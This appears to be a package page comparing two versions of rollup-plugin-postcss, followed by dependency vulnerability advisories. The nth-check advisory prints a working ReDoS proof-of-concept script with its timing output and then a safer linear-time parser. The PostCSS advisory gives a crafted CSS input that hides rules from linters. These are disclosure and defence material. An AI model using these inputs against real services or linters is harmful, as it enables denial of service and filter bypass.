Rollup Plugin PostCSS offers seamless integration of PostCSS into Rollup workflows, enabling developers to use modern CSS features within their JavaScript projects. Between versions 2.0.2 and 2.0.3 the core functionality is unchanged: both process CSS files with PostCSS and its ecosystem of plugins during the Rollup bundling step. Both versions declare identical dependencies, including cssnano for CSS optimization, postcss-modules for modular CSS, and postcss-load-config for flexible configuration. The development dependencies also match, which suggests the tooling used to test and build the plugin (@babel/core, eslint-config-rem and the jest test framework, among others) was stable across the two releases.
The only differences between the two versions are the release dates and the unpacked sizes. Version 2.0.3 was published only a few seconds after 2.0.2, and the extracted packages differ only slightly in size, so 2.0.3 most likely contains incremental fixes or tiny improvements rather than substantial feature additions. Adopting the latest version (2.0.3) is still advisable, since it carries the most up-to-date bug fixes and refinements and so contributes to a slightly more stable and optimized build process, even if the changes are not immediately apparent.
All vulnerabilities related to version 2.0.3 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerability of the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency, and can be exploited with the following code.
Proof of Concept
    // PoC.js
    var nthCheck = require("nth-check");

    // Grow the run of whitespace between "2n" and the invalid trailing "!"
    // and time how long nth-check.parse() takes to reject each string.
    for (var i = 1; i <= 50000; i++) {
        var time = Date.now();
        var attack_str = "2n" + " ".repeat(i * 10000) + "!";
        try {
            nthCheck.parse(attack_str);
        } catch (err) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
The Output
    attack_str.length: 10003: 174 ms
    attack_str.length: 20003: 1427 ms
    attack_str.length: 30003: 2602 ms
    attack_str.length: 40003: 4378 ms
    attack_str.length: 50003: 7473 ms
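The output above grows roughly quadratically because the two adjacent \s* groups can split the run of spaces in many ways before the trailing "!" makes the match fail. As an added illustration (not code from the advisory or from nth-check itself), the hypothetical parseNth below accepts the same an+b grammar with one left-to-right scan and no backtracking, so the same crafted input is rejected in linear time:

```javascript
// Added example: a linear-time parser for CSS "an+b" expressions.
// This is illustrative code, not nth-check's implementation; parseNth is a
// hypothetical name. It returns [a, b] for a valid formula and null otherwise.
function parseNth(formula) {
  const s = String(formula).trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];

  const n = s.length;
  let i = 0;
  // Each helper only moves forward, so the whole scan is O(n).
  const skipWs = () => { while (i < n && /\s/.test(s[i])) i++; };
  const readDigits = () => {
    const start = i;
    while (i < n && s[i] >= "0" && s[i] <= "9") i++;
    return s.slice(start, i);
  };

  // Optional leading sign, then digits, then either "n" (an+b form) or end (b only).
  let sign = 1;
  if (s[i] === "+" || s[i] === "-") { if (s[i] === "-") sign = -1; i++; }
  const digits = readDigits();
  let a = 0;
  let b = 0;

  if (s[i] === "n") {
    a = sign * (digits === "" ? 1 : parseInt(digits, 10)); // "n" alone means a = 1
    i++;
    skipWs();                       // consumes the whole padding run exactly once
    if (i === n) return [a, 0];
    if (s[i] !== "+" && s[i] !== "-") return null; // e.g. the trailing "!" above
    const bSign = s[i] === "-" ? -1 : 1;
    i++;
    skipWs();
    const bDigits = readDigits();
    if (bDigits === "") return null; // "2n+" is not a valid formula
    b = bSign * parseInt(bDigits, 10);
  } else {
    if (digits === "") return null;  // a bare sign or empty string
    b = sign * parseInt(digits, 10);
  }

  skipWs();
  return i === n ? [a, b] : null;    // reject any trailing garbage
}

module.exports = { parseNth };
```

Feeding the same "2n" + spaces + "!" strings from the PoC into parseNth returns null in time proportional to the string length, with no superlinear growth.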
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts will be included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.